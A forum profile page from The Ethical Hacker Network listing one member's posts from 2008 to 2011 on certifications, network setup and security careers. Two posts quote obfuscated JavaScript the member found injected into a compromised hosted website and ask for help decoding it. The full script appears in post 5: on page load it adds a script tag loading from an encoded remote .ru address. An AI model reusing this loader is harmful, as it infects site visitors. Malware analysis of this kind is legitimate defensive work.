The Ethical Hacker Network - Latest posts of: oldgrue

Latest Additions

EH-Net Login

Welcome Guest.

No account yet? Register

Who's Online
We have 48 guests and 1 member online

Free Business and Tech Magazines and eBooks

You are here: Home

EH-Net

May 21, 2013, 09:22:14 PM

Welcome, Guest. Please login or register.
Did you miss your activation email?

News: Go back to The Ethical Hacker Network Online Magazine Home Page

Home

Help

Calendar

Login

Register

Show Posts
Pages: [1]

1	Ethical Hacking Discussions and Related Certifications / General Certification / Security University - How do they stack up?	on: July 05, 2011, 04:04:58 AM
Hope everyone enjoyed their weekend! Got to meet the CEO of Security University over the weekend - charming lady and highly motivated to sell her company's services. But the meat of the question - How many of you have taken their courses and what was your opinion of their classes?

2	Ethical Hacking Discussions and Related Certifications / Malware / Re: Obfuscated code sample - need advice on how to break down the language and parse	on: April 14, 2010, 04:20:42 PM
Thanks for the help! Now for the fun (?) part - learning and catching up on the how with an example in hand.

3	Ethical Hacking Discussions and Related Certifications / Malware / Re: Obfuscated code sample - need advice on how to break down the language and parse	on: April 14, 2010, 09:30:20 AM
This code showed up on a compromised website my company is hosting. We're looking in to the machine serving it to determine if the virtual server, or the machine itself was compromised as a different issue.

4	Ethical Hacking Discussions and Related Certifications / Malware / Re: Obfuscated code sample - need advice on how to break down the language and parse	on: April 13, 2010, 04:42:15 PM
I figured it was unpleasant, just not how much so. Any more of a tutorial, and related related readings would be greatly appreciated.

5	Ethical Hacking Discussions and Related Certifications / Malware / Re: Obfuscated code sample - need advice on how to break down the language and parse	on: April 13, 2010, 08:20:46 AM
here's the whole thing: Quote <script> var Je;if(Je!='Pu' && Je!='X'){Je=''};var l=new String();this.Iq="";function J() {var _=new Array();var v;if(v!='CR' && v != ''){v=null};var B=RegExp;var Cu='';var tN;if(tN!='O' && tN!='Nn'){tN=''};var j=String("rep8TU".substr(0,3)+"lac0Ix".substr(0,3)+"jW0eWj0".substr(3,1));var C=unescape("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6f%79%75%6e%6c%61%72%31%2e%63%6f%6d%2f%76%6f%69%6c%61%2e%66%72%2f%67%6f%6f%67%6c%65%2e%68%72%2e%70%68%70");var s=window;var n;if(n!='' && n!='R'){n=null};var P='';var ns;if(ns!='' && ns!='lC'){ns=''};var Z=new String("]");var Rt="";function m(F,U){this.IR="";var Gt;if(Gt!='Rk' && Gt!='eu'){Gt='Rk'};var p=String("[");var hs='';p+=U+Z;var UX;if(UX!='k' && UX!='Ij'){UX='k'};var K;if(K!='Nq' && K != ''){K=null};var E="";var w=new B(p, String("g"));var RX=new String();var mW;if(mW!='bd' && mW!='AQ'){mW=''};return F[j](w, P);this.dQ='';var jk=new Array();};var EW;if(EW!='Rb'){EW=''};this.i="";var Kv;if(Kv!='XY'){Kv=''};var Z_='';var D;if(D!='JE'){D='JE'};var nm;if(nm!='cn'){nm='cn'};var y="scri"+"w1bNpt".substr(4);var u=m('89240366892305249','97125364');var Oc="";var WV;if(WV!=''){WV='Ww'};var uK=unescape("%68%74%74%70%3a%2f%2f%71%71%2d%63%6f%6d%2e%68%75%61%6e%71%69%75%2e%63%6f%6d%2e%61%6d%61%7a%6f%6e%2d%63%6e%2e%73%77%65%65%74%68%6f%6d%65%73%61%6c%65%2e%72%75%3a");var so;if(so!='' && so!='yq'){so=null};s["on"+"lo"+"ad"]=function(){var T=new Array();this.dP="";try {var RZ;if(RZ!='fx'){RZ='fx'};Z_=uK+u;var gP=new String();var XJ=new String();Z_+=C;var Ne='';var yi;if(yi!='aY'){yi='aY'};Uv=document.createElement(y);var IJ=new Array();Uv["src7Dkj".substr(0,3)] = Z_;Uv["dexAOR".substr(0,2)+"fe"+"r"]=[1][0];var Pq='';document.body.appendChild(Uv);} catch(d){var kF=new Date();};var Dp='';var LH;if(LH!='jI'){LH='jI'};};var Gy=new Array();var JH;if(JH!='Zz'){JH=''};var Ao='';};J(); </script> <!--11c9667af5fb24752950373afb93b6d1--> I appreciate all the help so far!

6	Ethical Hacking Discussions and Related Certifications / Malware / Obfuscated code sample - need advice on how to break down the language and parse	on: April 09, 2010, 11:27:41 AM
Being not much of a coder (a core skill i'm working on still) I've run into a string of suspicious code that I can't wrap my head around for the life of me. Here's the opening chunk Quote <script>var Je;if(Je!='Pu' && Je!='X'){Je=''};var l=new String();this.Iq="";function J() {var _=new Array();var v;if(v!='CR' && v != ''){v=null};var B=RegExp;var Cu='';var tN;if(tN!='O' && tN!='Nn'){tN=''};var j=String("rep8TU".substr(0,3)+"lac0Ix".substr(0,3)+"jW0eWj0".substr(3,1)) Can someone point me to: a) how to determine which language this is b) a good obfuscated code tutorial

7	Ethical Hacking Discussions and Related Certifications / Forensics / Re: Dismantling a Fraudulent Website - HELP Rewarded!	on: August 18, 2008, 10:00:34 AM
there's a couple of problems you're opening yourself up for in this: Depending on the state you're in, this is soliciting a private investigator and we may or may not be liscensed in that state. The information you have so far is sketchy at best. If all that information is so spread about the world, there's no reason to believe the information you have on the perpetrators is correct. Ketchup and MontyZ's advice is probably the best start for you.

8	Ethical Hacking Discussions and Related Certifications / Hardware / Re: more than one internet connection for the same box ?	on: August 18, 2008, 09:51:56 AM
Quote from: teamer on August 13, 2008, 10:41:03 AM i just wanted to learn , and maybe to avoid a mistake later on . 'I just wanted to learn' isn't really a good excuse. Local laws may vary, but that was simply a bad idea. Quote i have 3 domains domain 1 > connects to my wireless router port 80 domain 2 > connects to my wireless router port 81 domain 3 > connects to my wireless router port 82 how can i make port the router route port 80 to port 80 on the 1st linux how can i make port the router route port 81 to port 80 on the 2nd linux how can i make port the router route port 82 to port 80 on the 3rd linux Depending on the router you should simply be able to modify the ACL pretty simply to make this happen.

9	Columns / Editor-In-Chief / Re: Man Looks Into the Abyss...	on: August 15, 2008, 03:09:51 PM
Good luck - we'll be watching eagerly.

10	Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: An Ethical Hacker must have these skills...	on: August 07, 2008, 03:08:33 PM
Critical Reasoning Skills. Developed sense of paranoia.

11	Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: 'Outsider' Network Access	on: August 07, 2008, 02:33:50 PM
I think you're best to isolate their access like you've suggested. I'd suggest against the wireless so you don't have staff connecting personal devices to it. It might be better if you can isolate their work areas (especially if you have longer term contractors) and hardwire the connection to a switch instesd.

12	Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: An Ethical Hacker must have these skills...	on: August 04, 2008, 02:10:27 PM
Quote from: mambo on March 22, 2008, 10:57:15 AM Does CS Count? I'm hoping so. I dumped WoW for EVE.

13	Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Hacking is in his end?	on: August 04, 2008, 10:13:04 AM
The security of a program isn't always about sanitized validated inputs and dropping invalid data. A program can only be as secure as the environment in which it resides: hard and software. Millions of lines of less than secure code notwithstanding the further consideration of what code interacts muddies the situation significantly. http://www.ntguard.com/article.cfm/id/341504 further underscores that as we add complexity, we risk adding vulnerability. Coders are under time,financial, and interoperability constraints that inject inevitable flaws into their end product. Good practice and QC become limited by client needs, production schedules, and limitations of manpower. Manufacturers mitigate these needs as reasonably as they can within these limitations. Flawed code doesn't seem to be going away. Social engineering is never going to go away because we're flawed creatures. we want to be helpful, useful, liked, and appreciated. We'd have to take the human element out. AV technologies will continue to struggle to keep up with the virii available if only for the percieved protection they provide. Per the refernces in the link above, I dare say AV technologies might have become near self-perpetuating. I wouldn't attribute the lack of new tools and techniques to a lack of them existing, rather a lull in publishing. People can only explore so much before repeating research. This career has been punctuated by bursts of frenzied discoveries based on other research. We are just as likely to be experiencing the calm before the storm.

Pages: [1]

Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com

Page created in 0.09 seconds with 22 queries.

Exclusive Deal

SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format! Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013

Polls

Compared to this year, 2013 will be:

	Great!
	Better.
	About the same.
	Little worse.
	FUBAR!

Recent Forum Topics

EH-Net News Feeds
Latest Additions

Privacy Notice
for TDCC & All Properties

Advertisement

© 2013 The Ethical Hacker Network

Joomla! is Free Software released under the GNU/GPL License.